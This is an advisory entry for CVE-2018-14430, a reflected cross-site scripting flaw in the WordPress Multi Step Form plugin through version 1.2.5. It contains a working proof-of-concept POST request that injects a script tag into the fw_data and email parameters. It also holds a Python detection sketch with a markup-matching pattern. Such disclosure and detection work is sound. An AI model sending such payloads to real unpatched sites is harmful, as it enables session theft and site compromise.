Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS



Description
WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks.

Unauthenticated attackers can exploit this issue, for example by means of CSRF.
Proof of Concept
The following parameters of the fw_send_data function are vulnerable:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email

The following POST request causes an alert to be displayed in the browser:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0
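
For defenders reviewing captured traffic, the following Python sketch flags fw_send_email requests whose fw_data[...] or email values carry markup, and shows each value as it would look once HTML-encoded for output. It is an added example, not part of the original advisory or the plugin's code; the function name, the regular expressions and the benign sample body are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Request body taken from the advisory's PoC above.
POC_BODY = (
    "action=fw_send_email&id=1"
    "&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
    "&fw_data%5BTest%5D%5B1%5D%5B%5D=2"
    "&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com"
    "&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20"
    "&email=3%403.com&nonce=ba16aeb8b0"
)
# Constructed benign submission for comparison.
BENIGN_BODY = (
    "action=fw_send_email&id=1"
    "&fw_data%5BTest%5D%5B0%5D%5B%5D=Alice"
    "&fw_data%5BTest%5D%5B2%5D%5B%5D=alice%40example.com"
    "&email=alice%40example.com&nonce=0000000000"
)

AJAX_ACTION = "fw_send_email"
# Parameters the advisory lists: any bracketed fw_data key, plus email.
WATCHED_KEY = re.compile(r"^(?:fw_data(?:\[[^\]]*\])+|email)$")
# Heuristic (assumption): an opening/closing tag or an inline event handler.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=", re.IGNORECASE)


def suspicious_fields(body):
    """Return (param, raw value, HTML-encoded value) for each watched
    parameter of a fw_send_email request whose value carries markup."""
    pairs = parse_qsl(body, keep_blank_values=True)
    if not any(k == "action" and v == AJAX_ACTION for k, v in pairs):
        return []
    return [
        (key, value, html.escape(value))
        for key, value in pairs
        if WATCHED_KEY.match(key) and MARKUP.search(value)
    ]


if __name__ == "__main__":
    for name, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        hits = suspicious_fields(body)
        print(name, "ALERT" if hits else "ok")
        for key, raw, encoded in hits:
            print(f"  {key}: {raw!r} -> encoded for output: {encoded!r}")
```

The pattern match is a triage heuristic for logs or WAF review; the actual remedy is the plugin update listed below.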

Affects Plugin

Fixed in version 1.2.6

References

CVE 2018-14430
URL https://hackpuntes.com/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/
URL https://plugins.trac.wordpress.org/changeset/1917500/multi-step-form

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Javier Olmedo
Submitter Website https://hackpuntes.com
Submitter Twitter JJavierOlmedo
Views 4893
Verified Yes
WPVDB ID 9106

Timeline

Publicly Published 2018-07-20
Added 2018-07-30
Last Updated 2018-08-28
